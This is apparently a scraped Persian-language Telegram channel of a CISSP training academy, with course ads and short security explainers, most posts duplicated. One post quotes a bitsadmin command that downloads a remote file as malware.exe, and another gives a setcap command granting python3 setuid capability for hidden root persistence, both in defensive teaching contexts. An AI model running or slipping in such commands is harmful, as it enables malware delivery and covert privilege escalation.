یکی مانده به آخر !
جلسه امروز مقدمه ای بر پایان دوره دوم CISSP سال ۱۴۰۴ آکادمی روزبه و شرکت هامون بود. اما شروعی بر فردای بهتر با تحویل ۱۸ متخصص عالی امنیت به جامعه ایران و حتی سایر کشورها.
تلاش میکنم دوره ای که برگزار میکنم ممتاز باشد چون اول برای خودم ارزش قائلم و بعد به حق شرکت کنندگان احترام میگذارم
با شما خواهم بود در سومین دوره CISSP سال ۱۴۰۴ همراه با پکیج آمادگی آزمون رسمی به زبان زیبای فارسی : ثبت نام توسط واتس اپ 09902857290
Www.haumoun.com
جلسه امروز مقدمه ای بر پایان دوره دوم CISSP سال ۱۴۰۴ آکادمی روزبه و شرکت هامون بود. اما شروعی بر فردای بهتر با تحویل ۱۸ متخصص عالی امنیت به جامعه ایران و حتی سایر کشورها.
تلاش میکنم دوره ای که برگزار میکنم ممتاز باشد چون اول برای خودم ارزش قائلم و بعد به حق شرکت کنندگان احترام میگذارم
با شما خواهم بود در سومین دوره CISSP سال ۱۴۰۴ همراه با پکیج آمادگی آزمون رسمی به زبان زیبای فارسی : ثبت نام توسط واتس اپ 09902857290
Www.haumoun.com
❤7
باز شدن رمز پس از ۳۵ سال
در سال ۱۹۹۰، مجسمه “Kryptos” توسط هنرمند آمریکایی جیم سانبورن (Jim Sanborn) در محوطهٔ مرکزی سازمان سیا (CIA) نصب شد. این اثر ترکیبی از هنر و علم رمزنگاری است و از چهار بخش رمزگذاریشده تشکیل میشود که روی یک صفحهٔ مسی بزرگ حک شدهاند. هدف سانبورن آن بود که نشان دهد زیبایی در تلاقی بین رمزها، دانش، و راز نهفته است.
سه بخش اول طی سالهای دههٔ ۱۹۹۰ تا اوایل ۲۰۱۰ توسط رمزنگاران حرفهای و علاقهمندان در سراسر جهان رمزگشایی شد. این پیامها شامل تاریخچهٔ کشف مقابر مصر و ارجاعاتی به رمزنگاری کلاسیک بودند. در مقابل، بخش چهارم (K4) هرگز حل نشد و به یکی از بزرگترین معماهای رمزنگاری معاصر جهان تبدیل شد — حتی متخصصان سیا و آژانس امنیت ملی (NSA) نیز نتوانستند متن کامل آن را بازیابی کنند.
در طول سالها سانبورن چند “سرنخ” عمومی منتشر کرد، از جمله دو واژهٔ از متن رمزگشاییشده – “BERLIN” و “CLOCK” – که نشان میداد محل یا مضمون پیام احتمالاً با برلین و زمان ارتباط دارد. با وجود این، معما همچنان سربسته باقی ماند و جامعهٔ رمزنگاری آن را نمادی از مرز میان دانش انسانی و ناشناخته تلقی کرد.
در اکتبر ۲۰۲۵، سانبورن در مصاحبهای با نیویورک تایمز اعلام کرد که اکنون قصد دارد راهحل نهایی بخش چهارم Kryptos را افشا کند. او گفته است با توجه به سن بالا و گذر زمان، نمیخواهد این راز بدون توضیح از بین برود، بنابراین راهحل و مستندات اصلی طراحی آن را از طریق حراجی کریستی (Christie’s) به فروش میگذارد. این مجموعه شامل متن رمز اصلی، ترجمهٔ آشکار (Plaintext)، یادداشتهای طراحی و نسخههای اولیهٔ الگوریتم رمز است. درآمد حاصل احتمالاً به پروژههای هنری و آموزشی اهدا میشود.
افشای رمز Kryptos پس از ۳۵ سال پایانی نمادین بر یکی از طولانیترین چالشهای رمزنگاری دوران مدرن خواهد بود؛ اثری که مرز میان هنر، اطلاعات و اسرار دولتی را برای همیشه در تاریخ ثبت کرد
https://www.nytimes.com/2025/10/16/science/kryptos-cia-solution-sanborn-auction.html?unlocked_article_code=1.t08.Fb2g.wov0l-NgQKoE&smid=url-share
در سال ۱۹۹۰، مجسمه “Kryptos” توسط هنرمند آمریکایی جیم سانبورن (Jim Sanborn) در محوطهٔ مرکزی سازمان سیا (CIA) نصب شد. این اثر ترکیبی از هنر و علم رمزنگاری است و از چهار بخش رمزگذاریشده تشکیل میشود که روی یک صفحهٔ مسی بزرگ حک شدهاند. هدف سانبورن آن بود که نشان دهد زیبایی در تلاقی بین رمزها، دانش، و راز نهفته است.
سه بخش اول طی سالهای دههٔ ۱۹۹۰ تا اوایل ۲۰۱۰ توسط رمزنگاران حرفهای و علاقهمندان در سراسر جهان رمزگشایی شد. این پیامها شامل تاریخچهٔ کشف مقابر مصر و ارجاعاتی به رمزنگاری کلاسیک بودند. در مقابل، بخش چهارم (K4) هرگز حل نشد و به یکی از بزرگترین معماهای رمزنگاری معاصر جهان تبدیل شد — حتی متخصصان سیا و آژانس امنیت ملی (NSA) نیز نتوانستند متن کامل آن را بازیابی کنند.
در طول سالها سانبورن چند “سرنخ” عمومی منتشر کرد، از جمله دو واژهٔ از متن رمزگشاییشده – “BERLIN” و “CLOCK” – که نشان میداد محل یا مضمون پیام احتمالاً با برلین و زمان ارتباط دارد. با وجود این، معما همچنان سربسته باقی ماند و جامعهٔ رمزنگاری آن را نمادی از مرز میان دانش انسانی و ناشناخته تلقی کرد.
در اکتبر ۲۰۲۵، سانبورن در مصاحبهای با نیویورک تایمز اعلام کرد که اکنون قصد دارد راهحل نهایی بخش چهارم Kryptos را افشا کند. او گفته است با توجه به سن بالا و گذر زمان، نمیخواهد این راز بدون توضیح از بین برود، بنابراین راهحل و مستندات اصلی طراحی آن را از طریق حراجی کریستی (Christie’s) به فروش میگذارد. این مجموعه شامل متن رمز اصلی، ترجمهٔ آشکار (Plaintext)، یادداشتهای طراحی و نسخههای اولیهٔ الگوریتم رمز است. درآمد حاصل احتمالاً به پروژههای هنری و آموزشی اهدا میشود.
افشای رمز Kryptos پس از ۳۵ سال پایانی نمادین بر یکی از طولانیترین چالشهای رمزنگاری دوران مدرن خواهد بود؛ اثری که مرز میان هنر، اطلاعات و اسرار دولتی را برای همیشه در تاریخ ثبت کرد
https://www.nytimes.com/2025/10/16/science/kryptos-cia-solution-sanborn-auction.html?unlocked_article_code=1.t08.Fb2g.wov0l-NgQKoE&smid=url-share
Nytimes
A C.I.A. Secret Kept for 35 Years Is Found in the Smithsonian’s Vault (Gift Article)
Jim Sanborn is auctioning off the solution to Kryptos, the puzzle he sculpted for the intelligence agency’s headquarters. Two fans of the work then discovered the key.
❤5⚡2
دوره CISSP یکتا و ممتاز
برای تمام ایرانیان -آنلاین
با پکیج ویژه و یکسال منتورینگ استاد روزبه
واتس اپ 09902857290
کاملترین دوره CISSP در ایران به تایید دانشجویان
✳️✳️✳️✳️✳️✳️✳️
#آکادمی_روزبه
مرکز تخصصی CISSP
www.haumoun.com
سمینار و کارگاه عملی CISSP
مختص دانشجویان آکادمی روزبه و شرکت هامون www.haumoun.com
۸ آبانماه ۱۴۰۴ تهران
**این سمینار جزو پکیج آموزشی آمادگی آزمون CISSP است که در راستای جبران کمبود روش تدریس آنلاین و انجام کارگاه و منتورینگ و نتورکینگ اعضای کلاس های امسال؛ تشکیل میگردد
برای تمام ایرانیان -آنلاین
با پکیج ویژه و یکسال منتورینگ استاد روزبه
واتس اپ 09902857290
کاملترین دوره CISSP در ایران به تایید دانشجویان
✳️✳️✳️✳️✳️✳️✳️
#آکادمی_روزبه
مرکز تخصصی CISSP
www.haumoun.com
سمینار و کارگاه عملی CISSP
مختص دانشجویان آکادمی روزبه و شرکت هامون www.haumoun.com
۸ آبانماه ۱۴۰۴ تهران
**این سمینار جزو پکیج آموزشی آمادگی آزمون CISSP است که در راستای جبران کمبود روش تدریس آنلاین و انجام کارگاه و منتورینگ و نتورکینگ اعضای کلاس های امسال؛ تشکیل میگردد
👏4❤1
وقتی EDR خوب داشته باشی قبل از عمل؛ دستور مهاجم Kill میشه تا SOC ات سرش خلوت باشه و بتونه به کشف Zero day امیدوار باشه
این کامندیه که کیل شده
bitsadmin /transfer MyDownloadJob /download /priority NORMAL "https://lnkd.in/dAg93i59" "C:\Users\Public\Downloads\malware.exe
این کامندیه که کیل شده
bitsadmin /transfer MyDownloadJob /download /priority NORMAL "https://lnkd.in/dAg93i59" "C:\Users\Public\Downloads\malware.exe
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
💯7
تجربه
یکی از روشهای مورد استفاده مهاجمان برای این که بتوانند دسترسی root را دوباره بهدست بیاورند، استفاده از «Linux Capabilities» برای باینری Python است.
مثال :
bash
setcap cap_setuid+ep /usr/bin/python3.12
توضیح:
در لینوکس، دستور setcap به یک فایل اجرایی قابلیتهایی (Capabilities) میدهد که معمولاً فقط فایلهای با سطح دسترسی SUID دارند.
در این مثال، با فعالکردن قابلیت cap_setuid+ep برای /usr/bin/python3.12، مهاجم باعث میشود که باینری Python بتواند سطح دسترسی کاربر جاری را به root تغییر دهد (مثل setuid root بدون نیاز به SUID bit).
⚠️ پیامد امنیتی:
بدون اینکه بیت SUID را روی فایل Python تنظیم کنند یا باینری را تغییر دهند، مهاجم میتواند با استفاده از همین قابلیتها:
از طریق Python یک شِل (Shell) با دسترسی root اجرا کند.
دربپشتیهای سطح پایین و پنهان بسازد.
این تغییر سطح دسترسی ممکن است از دید ابزارهای امنیتی یا سیستمهای مانیتورینگ ساده پنهان بماند، چون فایل Python هنوز ظاهر عادی دارد.
#نشر_دانش
#آکادمی_روزبه
مرکز تخصصی CISSP
یکی از روشهای مورد استفاده مهاجمان برای این که بتوانند دسترسی root را دوباره بهدست بیاورند، استفاده از «Linux Capabilities» برای باینری Python است.
مثال :
bash
setcap cap_setuid+ep /usr/bin/python3.12
توضیح:
در لینوکس، دستور setcap به یک فایل اجرایی قابلیتهایی (Capabilities) میدهد که معمولاً فقط فایلهای با سطح دسترسی SUID دارند.
در این مثال، با فعالکردن قابلیت cap_setuid+ep برای /usr/bin/python3.12، مهاجم باعث میشود که باینری Python بتواند سطح دسترسی کاربر جاری را به root تغییر دهد (مثل setuid root بدون نیاز به SUID bit).
⚠️ پیامد امنیتی:
بدون اینکه بیت SUID را روی فایل Python تنظیم کنند یا باینری را تغییر دهند، مهاجم میتواند با استفاده از همین قابلیتها:
از طریق Python یک شِل (Shell) با دسترسی root اجرا کند.
دربپشتیهای سطح پایین و پنهان بسازد.
این تغییر سطح دسترسی ممکن است از دید ابزارهای امنیتی یا سیستمهای مانیتورینگ ساده پنهان بماند، چون فایل Python هنوز ظاهر عادی دارد.
#نشر_دانش
#آکادمی_روزبه
مرکز تخصصی CISSP
🙏4❤1
قابل توجه مسوولان
روند افزایشی را در برون سپاری خدمات IT و امنیت را شاهد هستم.
در کنار منافع ( که برخی مواقع جبر بوده ) بایستی ریسک ها را هم در نظر گرفت.
🔴لازم است مسوولان کشوری نسبت به تهیه و ابلاغ تطابق سنجی با گزارشاتی چون SOC1, 2,3 اقدام کنند تا برون سپاری ها تحت کنترل باشد وگرنه در آینده نزدیک شاهد شکست های حفاظتی شدید از سوی پیمانکاران خواهیم بود
هلدینگ ها و شرکت های مادر هم میتوانند با ابلاغ گزارشات تطابق سنجی SOC به زیر مجموعه های خود نقشی مهم در کنترل امنیت ایفا کنند
۲۷ مهرماه ۱۴۰۴ ثبت شد.
روزبه نوروزی
**گزارشات SOC از بحث مرکز عملیات امنیت جداست و مقوله ای نظارتی است.
روند افزایشی را در برون سپاری خدمات IT و امنیت را شاهد هستم.
در کنار منافع ( که برخی مواقع جبر بوده ) بایستی ریسک ها را هم در نظر گرفت.
🔴لازم است مسوولان کشوری نسبت به تهیه و ابلاغ تطابق سنجی با گزارشاتی چون SOC1, 2,3 اقدام کنند تا برون سپاری ها تحت کنترل باشد وگرنه در آینده نزدیک شاهد شکست های حفاظتی شدید از سوی پیمانکاران خواهیم بود
هلدینگ ها و شرکت های مادر هم میتوانند با ابلاغ گزارشات تطابق سنجی SOC به زیر مجموعه های خود نقشی مهم در کنترل امنیت ایفا کنند
۲۷ مهرماه ۱۴۰۴ ثبت شد.
روزبه نوروزی
**گزارشات SOC از بحث مرکز عملیات امنیت جداست و مقوله ای نظارتی است.
👌8❤3👍3
وصله شده این dMSA، درست؛ ولی BadSuccessor از attribute دیگری در همان ساختار trust chain سوءاستفاده میکند.
توجه داشته باشید
دوره های سطح ۱ و ۲
پوشش دهنده گپ های دانشی شما
https://specterops.io/blog/2025/10/20/the-near-return-of-the-king-account-takeover-using-the-badsuccessor-technique/
توجه داشته باشید
دوره های سطح ۱ و ۲
پوشش دهنده گپ های دانشی شما
https://specterops.io/blog/2025/10/20/the-near-return-of-the-king-account-takeover-using-the-badsuccessor-technique/
SpecterOps
The (Near) Return of the King: Account Takeover Using the BadSuccessor Technique - SpecterOps
After Microsoft patched Yuval Gordon’s BadSuccessor privilege escalation technique, BadSuccessor returned with another blog from Yuval, briefly mentioning to the community that attackers can still abuse dMSAs to take over any object where we have a write…
⚡3💯1
#امنیت_به_زبان_ساده
هرم درد : تمرکز بر راس هرم
تاکتیکها، تکنیکها و رویهها (TTPs) سخت و موثر
کشف TTPs بالاترین و مؤثرترین و سخت ترین سطح دفاع است. در این سطح، ما دیگر به دنبال یک فایل یا ابزار خاص نیستیم، بلکه به دنبال الگوی رفتاری مهاجم هستیم
تاکتیک (Tactic): هدف کلی مهاجم چیست؟ (مثلاً: دسترسی اولیه، ارتقای سطح دسترسی، حرکت جانبی در شبکه).
تکنیک (Technique): چگونه آن هدف را دنبال میکند؟ (مثلاً: برای دسترسی اولیه از فیشینگ استفاده میکند).
رویه (Procedure): جزئیات دقیق پیادهسازی آن تکنیک چگونه است؟ (مثلاً: ایمیل فیشینگ با یک فایل PDF آلوده که از یک آسیبپذیری خاص در Adobe Reader استفاده میکند).
برای مدافع: شناسایی TTPها نیازمند دید جامع به کل زنجیره حمله، تحلیلگران خبره و ابزارهای پیشرفته مانند SIEM و SOAR است. ما به دنبال “داستان” حمله هستیم، نه فقط یک نشانه . هم سخت است هم موثر . کشف کردن این عنصر نیاز به یک عملیات پیچیده دارد اما وقتی کشف شد هکر را خلع سلاح میکند
درد برای مهاجم: فلجکننده! وقتی ما بتوانیم TTPهای یک مهاجم را شناسایی کنیم ، در واقع کل استراتژی و کتابچه راهنمای (Playbook) او را بیاثر کردهایم.
مهاجم دیگر نمیتواند با تغییر ابزار یا IP به کار خود ادامه دهد. او باید روش فکر کردن و عمل کردن خود را از پایه تغییر دهد که این کار بسیار پرهزینه، زمانبر و گاهی غیرممکن است.
مثال: ما متوجه میشویم که مهاجم همیشه ابتدا از طریق فیشینگ وارد میشود، سپس با استفاده از PowerShell یک اسکریپت بدون فایل (Fileless) را برای حرکت جانبی اجرا میکند و در نهایت دادهها را فشرده کرده و از طریق DNS Tunneling به بیرون ارسال میکند. ما با تمرکز بر شناسایی و مسدود کردن هر یک از این رفتارها (نه فقط ابزارها)، کل عملیات او را، صرف نظر از ابزاری که استفاده میکند، مختل میکنیم.
#آکادمی_روزبه www.haumoun.com
ثبت نام دوره سطح ۱ و ۲ واتس اپ 09902857290
هرم درد : تمرکز بر راس هرم
تاکتیکها، تکنیکها و رویهها (TTPs) سخت و موثر
کشف TTPs بالاترین و مؤثرترین و سخت ترین سطح دفاع است. در این سطح، ما دیگر به دنبال یک فایل یا ابزار خاص نیستیم، بلکه به دنبال الگوی رفتاری مهاجم هستیم
تاکتیک (Tactic): هدف کلی مهاجم چیست؟ (مثلاً: دسترسی اولیه، ارتقای سطح دسترسی، حرکت جانبی در شبکه).
تکنیک (Technique): چگونه آن هدف را دنبال میکند؟ (مثلاً: برای دسترسی اولیه از فیشینگ استفاده میکند).
رویه (Procedure): جزئیات دقیق پیادهسازی آن تکنیک چگونه است؟ (مثلاً: ایمیل فیشینگ با یک فایل PDF آلوده که از یک آسیبپذیری خاص در Adobe Reader استفاده میکند).
برای مدافع: شناسایی TTPها نیازمند دید جامع به کل زنجیره حمله، تحلیلگران خبره و ابزارهای پیشرفته مانند SIEM و SOAR است. ما به دنبال “داستان” حمله هستیم، نه فقط یک نشانه . هم سخت است هم موثر . کشف کردن این عنصر نیاز به یک عملیات پیچیده دارد اما وقتی کشف شد هکر را خلع سلاح میکند
درد برای مهاجم: فلجکننده! وقتی ما بتوانیم TTPهای یک مهاجم را شناسایی کنیم ، در واقع کل استراتژی و کتابچه راهنمای (Playbook) او را بیاثر کردهایم.
مهاجم دیگر نمیتواند با تغییر ابزار یا IP به کار خود ادامه دهد. او باید روش فکر کردن و عمل کردن خود را از پایه تغییر دهد که این کار بسیار پرهزینه، زمانبر و گاهی غیرممکن است.
مثال: ما متوجه میشویم که مهاجم همیشه ابتدا از طریق فیشینگ وارد میشود، سپس با استفاده از PowerShell یک اسکریپت بدون فایل (Fileless) را برای حرکت جانبی اجرا میکند و در نهایت دادهها را فشرده کرده و از طریق DNS Tunneling به بیرون ارسال میکند. ما با تمرکز بر شناسایی و مسدود کردن هر یک از این رفتارها (نه فقط ابزارها)، کل عملیات او را، صرف نظر از ابزاری که استفاده میکند، مختل میکنیم.
#آکادمی_روزبه www.haumoun.com
ثبت نام دوره سطح ۱ و ۲ واتس اپ 09902857290
❤6💯1
تجربه امروز در SOC و پایگاه داده
اسکما
در معماری پایش امنیتی پایگاهداده، وجود یک سازوکار هماهنگ میان Parser، Rule Engine و Dashboard حیاتی است تا تحلیلگر SOC بتواند رفتارهای غیرعادی را در لایه داده بهصورت دقیق و با زمینه سازی (Context Awareness) مشاهده کند.
نخستین گام، تقویت Parser است؛ این مؤلفه باید فیلد حیاتی schema_name را از لاگهای SQL استخراج و ذخیره کند، زیرا بدون آن، تشخیص سطح حساسیت و حوزهی داده عملاً غیرممکن است. دادههای خام، زمانی ارزش امنیتی مییابند که با اسکما مرتبط شوند و مشخص شود عملیات روی کدام بخش از دادههای سازمان انجام گرفته است.
در گام دوم، Rule Engine باید تناظر یابی حساسیت یا Sensitivity Mapping اسکماها را بشناسد و آن را در تحلیل همبسته بهکار گیرد. به این معنا که یک دستور SELECT از اسکمای عمومی ممکن است عادی تلقی شود، اما همان دستور از اسکمای مالی یا منابع انسانی باید بهعنوان رویداد پرریسک نشانهگذاری گردد. این همبستگی میان حساسیت داده و رفتار کاربر، مبنای تشخیص تهدیدهای داخلی و دسترسیهای غیرمجاز است.
در نهایت، Dashboard باید خروجی تحلیل را بر اساس طبقهبندی اسکماها نمایش دهد تا فعالیتهای مرتبط با اسکماهای Critical در نمایی مجزا، فوری و رنگکدبندیشده در دسترس تیم SOC قرار گیرد.
#آکادمی_روزبه
اسکما
در معماری پایش امنیتی پایگاهداده، وجود یک سازوکار هماهنگ میان Parser، Rule Engine و Dashboard حیاتی است تا تحلیلگر SOC بتواند رفتارهای غیرعادی را در لایه داده بهصورت دقیق و با زمینه سازی (Context Awareness) مشاهده کند.
نخستین گام، تقویت Parser است؛ این مؤلفه باید فیلد حیاتی schema_name را از لاگهای SQL استخراج و ذخیره کند، زیرا بدون آن، تشخیص سطح حساسیت و حوزهی داده عملاً غیرممکن است. دادههای خام، زمانی ارزش امنیتی مییابند که با اسکما مرتبط شوند و مشخص شود عملیات روی کدام بخش از دادههای سازمان انجام گرفته است.
در گام دوم، Rule Engine باید تناظر یابی حساسیت یا Sensitivity Mapping اسکماها را بشناسد و آن را در تحلیل همبسته بهکار گیرد. به این معنا که یک دستور SELECT از اسکمای عمومی ممکن است عادی تلقی شود، اما همان دستور از اسکمای مالی یا منابع انسانی باید بهعنوان رویداد پرریسک نشانهگذاری گردد. این همبستگی میان حساسیت داده و رفتار کاربر، مبنای تشخیص تهدیدهای داخلی و دسترسیهای غیرمجاز است.
در نهایت، Dashboard باید خروجی تحلیل را بر اساس طبقهبندی اسکماها نمایش دهد تا فعالیتهای مرتبط با اسکماهای Critical در نمایی مجزا، فوری و رنگکدبندیشده در دسترس تیم SOC قرار گیرد.
#آکادمی_روزبه
👏9❤1
بیاموزید
نشر دهید
چیزی از شما کم نمیشود
بلکه
افزون میشود
امتحان کنید
نشر دهید
چیزی از شما کم نمیشود
بلکه
افزون میشود
امتحان کنید
❤23💯5
الان میخوانم ؛ برایتان خواهم نوشت
https://specterops.io/blog/2025/10/23/catching-credential-guard-off-guard/
https://specterops.io/blog/2025/10/23/catching-credential-guard-off-guard/
SpecterOps
Catching Credential Guard Off Guard - SpecterOps
Uncovering the protection mechanisms provided by modern Windows security features and identifying new methods for credential dumping.
❤5
👏9
از ارائه های همایش فارغالتحصیلان CISSP
🟣چرا در حلقهی OODA، توقف در “مشاهده” و “جهتگیری” ضامن تصمیمات امنیتی موفق است؟
💯تبریک به فارغالتحصیلان محترم آکادمی روزبه.
دریافت گواهی CISSP یک نقطه عطف فنی نیست؛ بلکه تأییدیهای بر توانایی شما در تفکر استراتژیک، جامع و ریسکمحور است.
در دنیای امنیت که سرعت تغییرات تهدیدات سرسامآور است، بزرگترین ابزار شما دیگر یک فایروال نیست، بلکه حلقه OODA (Observe, Orient, Decide, Act) است. اما چگونه یک CISSP حرفهای از این چارچوب برای جلوگیری از فاجعه استفاده میکند؟
🔴بزرگترین اشتباه در مدیریت امنیت، عجله برای رسیدن به فاز “Decide” (تصمیم) و “Act” (اجرا) است. رهبران امنیتی موفق، عمداً سرعت خود را در فازهای ابتدایی - “Observe” (مشاهده) و “Orient” (جهتگیری) - کاهش میدهند.
مشاهده فراتر از داده: در فاز “Observe”، ما صرفاً به هشدارها و لاگهای خام نگاه نمیکنیم. ما به جمعآوری اطلاعات جامع (Threat Intelligence)، درک عمیق از معماری کسبوکار، تعامل با قوانین و مقررات، و آگاهی از فرهنگ سازمانی میپردازیم. مشاهده یک متخصص CISSP شامل متن (Context) است، نه فقط داده.
فاز “Orient” حیاتیترین بخش است که اغلب نادیده گرفته میشود. اینجا جایی است که داده خام به بینش عملی تبدیل میشود. در این مرحله، ما:
✅️دادههای مشاهده شده را در فریمورکهای ریسک (مانند ISO 27005 یا NIST) مدلسازی میکنیم.
✅️ تعصبات شناختی (Cognitive Biases) تیم و خودمان را شناسایی میکنیم.
✅️تأثیرات تصمیمات احتمالی بر روی موجودیتهای کلیدی (C-Suite، مشتریان، سهامداران) را پیشبینی میکنیم.
✅️دانش خود در حوزه معماری امنیت و طراحی سیستمهای امن را برای درک اینکه آیا این تهدید یک نقص سیستمی است یا یک نقص عملیاتی، به کار میگیریم.
🔰توقف هوشمندانه، تصمیم ایمن: اگر فازهای “Observe” و “Orient” با عمق کافی انجام نشود، تصمیم (Decide) در خلاء یا بر اساس فرضیات ناقص گرفته خواهد شد. تصمیمگیری عجولانه منجر به “اقدامات فاجعهبار” میشود: هدر رفتن بودجه، اتخاذ راهحلهای کوتاهمدت ناامن، یا بدتر از همه، نادیده گرفتن ریشه اصلی مشکل.
✳️به عنوان یک CISSP، ماموریت ما کاهش دادن زمان کل حلقه OODA است، و این کاهش زمان نه با سرعت دادن به مراحل، بلکه با افزایش دقت “مشاهده” و “جهتگیری” محقق میشود. این کند کردن استراتژیک، تضمین میکند که تصمیمات ما دقیق و پایدار باشند و احتمال شکست استراتژیک به حداقل برسد.
موفقیت شما در امنیت، در عمق تفکر شما نهفته است، نه فقط در سرعت عملتان.
#OODA #مدیریت_ریسک #امنیت_اطلاعات #آکادمی_روزبه
www.haumoun.com
پنج شنبه ۸ آبان ۱۴۰۴ تهران شرکت هامون
🟣چرا در حلقهی OODA، توقف در “مشاهده” و “جهتگیری” ضامن تصمیمات امنیتی موفق است؟
💯تبریک به فارغالتحصیلان محترم آکادمی روزبه.
دریافت گواهی CISSP یک نقطه عطف فنی نیست؛ بلکه تأییدیهای بر توانایی شما در تفکر استراتژیک، جامع و ریسکمحور است.
در دنیای امنیت که سرعت تغییرات تهدیدات سرسامآور است، بزرگترین ابزار شما دیگر یک فایروال نیست، بلکه حلقه OODA (Observe, Orient, Decide, Act) است. اما چگونه یک CISSP حرفهای از این چارچوب برای جلوگیری از فاجعه استفاده میکند؟
🔴بزرگترین اشتباه در مدیریت امنیت، عجله برای رسیدن به فاز “Decide” (تصمیم) و “Act” (اجرا) است. رهبران امنیتی موفق، عمداً سرعت خود را در فازهای ابتدایی - “Observe” (مشاهده) و “Orient” (جهتگیری) - کاهش میدهند.
مشاهده فراتر از داده: در فاز “Observe”، ما صرفاً به هشدارها و لاگهای خام نگاه نمیکنیم. ما به جمعآوری اطلاعات جامع (Threat Intelligence)، درک عمیق از معماری کسبوکار، تعامل با قوانین و مقررات، و آگاهی از فرهنگ سازمانی میپردازیم. مشاهده یک متخصص CISSP شامل متن (Context) است، نه فقط داده.
فاز “Orient” حیاتیترین بخش است که اغلب نادیده گرفته میشود. اینجا جایی است که داده خام به بینش عملی تبدیل میشود. در این مرحله، ما:
✅️دادههای مشاهده شده را در فریمورکهای ریسک (مانند ISO 27005 یا NIST) مدلسازی میکنیم.
✅️ تعصبات شناختی (Cognitive Biases) تیم و خودمان را شناسایی میکنیم.
✅️تأثیرات تصمیمات احتمالی بر روی موجودیتهای کلیدی (C-Suite، مشتریان، سهامداران) را پیشبینی میکنیم.
✅️دانش خود در حوزه معماری امنیت و طراحی سیستمهای امن را برای درک اینکه آیا این تهدید یک نقص سیستمی است یا یک نقص عملیاتی، به کار میگیریم.
🔰توقف هوشمندانه، تصمیم ایمن: اگر فازهای “Observe” و “Orient” با عمق کافی انجام نشود، تصمیم (Decide) در خلاء یا بر اساس فرضیات ناقص گرفته خواهد شد. تصمیمگیری عجولانه منجر به “اقدامات فاجعهبار” میشود: هدر رفتن بودجه، اتخاذ راهحلهای کوتاهمدت ناامن، یا بدتر از همه، نادیده گرفتن ریشه اصلی مشکل.
✳️به عنوان یک CISSP، ماموریت ما کاهش دادن زمان کل حلقه OODA است، و این کاهش زمان نه با سرعت دادن به مراحل، بلکه با افزایش دقت “مشاهده” و “جهتگیری” محقق میشود. این کند کردن استراتژیک، تضمین میکند که تصمیمات ما دقیق و پایدار باشند و احتمال شکست استراتژیک به حداقل برسد.
موفقیت شما در امنیت، در عمق تفکر شما نهفته است، نه فقط در سرعت عملتان.
#OODA #مدیریت_ریسک #امنیت_اطلاعات #آکادمی_روزبه
www.haumoun.com
پنج شنبه ۸ آبان ۱۴۰۴ تهران شرکت هامون
⚡4🙏2❤1
بحثی حقوقی از درس CISSP
📘 مسئولیت مستقیم شرکتها (Direct Liability)
مسئولیت مستقیم یعنی حالتی که شرکت یا سازمان به خاطر اجازه دادن، چشمپوشی، یا نادیده گرفتن رفتار نادرست یکی از کارکنانش، خودش بهطور مستقیم در برابر قانون پاسخگو میشود.
به بیان سادهتر، اگر شرکت به شکل آگاهانه، یا از روی سهلانگاری، باعث شود کارمندی عمل خلافی انجام دهد، قانون آن را رفتار خود شرکت تلقی میکند.
این موضوع بهویژه درباره مدیران و افرادی صادق است که از طرف سازمان اختیار قانونی دارند و به نام آن عمل میکنند. چون مدیران میتوانند بخشی از مسئولیتهایشان را به کارمندان تفویض کنند، هرگاه فردی در چارچوب همان اختیار تفویضشده کاری انجام دهد، ممکن است مسئولیت مستقیماً متوجه شرکت شود.
بنابراین اگر بتوان ثابت کرد که رفتار، تصمیم یا کوتاهی شرکت موجب انجام عمل مجرمانه شده است، قانون سازمان را مسئول مستقیم جرم میداند، نه فقط کارمند متخلف را.
⚖️ رابطه با مفهوم Mens Rea (نیت یا آگاهی مجرمانه)
در جرائم کیفری، اصل بر این است که دادگاه باید ثابت کند فرد از پیامدهای مجرمانهی کار خود آگاه بوده و قصد ارتکاب جرم را داشته است ؛ یعنی وجود Mens Rea.
در مورد یک شرکت، این آگاهی معمولاً در تصمیمها یا خطمشیهای مدیریتی جستجو میشود.
با این حال، نوعی از جرائم وجود دارند که در آنها نیازی به اثبات نیت یا قصد مجرمانه نیست و همین وقوع عمل ممنوعه برای مسئولیتپذیری کافی است.
به این جرائم میگویند: جرائم با مسئولیت مطلق (Strict Liability Offenses).
در چنین حالتی، اگر کارمند در حین انجام وظایف خود مرتکب تخلفی شود -مثلاً نقض مقررات زیستمحیطی یا امنیت داده - شرکت بدون نیاز به اثبات قصد، پاسخگو خواهد بود.
🧩 اصل انتساب رفتار کارمند به شرکت
وقتی قانون، مسئولیت را به شرکتها تسری دهد، رفتار یا حتی قصد ذهنی یک کارمند میتواند به شرکت نسبت داده شود.
اما این انتساب فقط زمانی معتبر است که:
رفتار انجامشده در چارچوب وظایف شغلی و اختیارات قانونی فرد باشد.
به این معیار، در حقوق کیفری و مدیریتی، اصطلاحاً “Course and Capacity of Employment Benchmark” میگویند.
اگر کارمند دست به کاری بزند که خارج از محدودهی اختیاراتش است (مثلاً دسترسی غیرمجاز یا کلاهبرداری رایانهای برای منافع شخصی)، مسئولیت او بر عهدهی خودش است ؛ هرچند که سازمان کاملاً از تبعات حقوقی آن در امان نخواهد بود، چون ممکن است نبود کنترلهای نظارتی یا سهلانگاری مدیریتی خود شرکت زیر سؤال برود.
جمع بندی
مقوله Direct Liability یعنی سازمان بدون واسطه در وقوع جرم نقش داشته (با اقدام یا کوتاهی).
و Mens Rea در شرکت از طریق تصمیمها، سیاستها و بیاحتیاطی مدیران نمایان میشود.
وStrict Liability یعنی کافی است عمل ممنوعه رخ دهد تا شرکت مسئول باشد، حتی بدون اثبات نیت.
وCourse and Capacity Benchmark حدی است که تشخیص میدهد عمل کارمند، کاری سازمانی بوده یا شخصی.
وجود کنترلها، آموزشها و خطمشیهای روشن میتواند از انتساب Mens Rea به سازمان جلوگیری کند و این دقیقاً مصداق Due Diligence / Due Care است.
#آکادمی_روزبه
📘 مسئولیت مستقیم شرکتها (Direct Liability)
مسئولیت مستقیم یعنی حالتی که شرکت یا سازمان به خاطر اجازه دادن، چشمپوشی، یا نادیده گرفتن رفتار نادرست یکی از کارکنانش، خودش بهطور مستقیم در برابر قانون پاسخگو میشود.
به بیان سادهتر، اگر شرکت به شکل آگاهانه، یا از روی سهلانگاری، باعث شود کارمندی عمل خلافی انجام دهد، قانون آن را رفتار خود شرکت تلقی میکند.
